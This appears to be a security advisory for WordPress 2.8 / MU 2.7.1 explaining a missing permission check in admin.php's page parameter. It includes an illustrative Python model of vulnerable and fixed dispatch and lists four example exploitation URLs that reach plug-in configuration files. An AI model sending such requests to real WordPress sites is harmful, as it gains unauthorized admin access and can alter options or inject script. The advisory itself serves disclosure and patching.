Affected Versions:
WordPress 2.8/WordPress MU 2.7.1
Program introduction:
WordPress is a free blog system.
Vulnerability Analysis:
WordPress does not perform a permission check on the PHP module loaded through the page parameter when serving plug-in configuration pages. If a non-privileged user substitutes admin.php for options-general.php or plugins.php in the request, they can view the contents of a plug-in's configuration page without authorization, and in some cases modify plug-in options and inject JavaScript code.
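The missing check described above, modelled as an added example (illustrative Python, not WordPress's own code): the vulnerable dispatcher serves whatever plug-in file the page parameter names to any logged-in user, while the hardened one only serves pages a plug-in has registered, and only to users holding the capability registered for that page. The plug-in directory, registry entries and capability names are assumptions.

```python
# Model of an admin.php-style dispatcher that loads a plug-in page from ?page=.
# Illustrative code, not WordPress source; paths, registry and capability
# names below are assumptions chosen for the example.
from dataclasses import dataclass, field
from typing import Optional

PLUGIN_DIR = "/var/www/wp-content/plugins"  # assumed install location


@dataclass
class User:
    login: str
    capabilities: set = field(default_factory=set)


@dataclass
class AdminPage:
    slug: str        # value a plug-in registers for ?page=
    capability: str  # capability a user must hold to view the page
    file: str        # plug-in file that renders the page


# Assumed registry: what a plug-in would register for its settings page.
REGISTERED_PAGES = {
    "akismet-config": AdminPage("akismet-config", "manage_options", "akismet/akismet.php"),
}


def vulnerable_dispatch(user: User, page: str) -> Optional[str]:
    """Mirrors the flaw: being logged in at all is enough, and `page` is
    treated as a file path under the plug-in directory with no authorization."""
    if not user.capabilities:
        return None
    return f"{PLUGIN_DIR}/{page.lstrip('/')}"


def hardened_dispatch(user: User, page: str) -> Optional[str]:
    """Serve only registered pages, and only to users with the page's capability.
    Unregistered slugs (including raw file paths) are refused outright."""
    entry = REGISTERED_PAGES.get(page)
    if entry is None or entry.capability not in user.capabilities:
        return None
    return f"{PLUGIN_DIR}/{entry.file}"
```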
Vulnerability Exploitation:
http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php
Solution:
Vendor patch:
WordPress
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://wordpress.org/
Information Source:
<* Source: Fernando Arnaboldi
Link: http://marc.info/?l=bugtraq&m=124709299823452&w=2
*>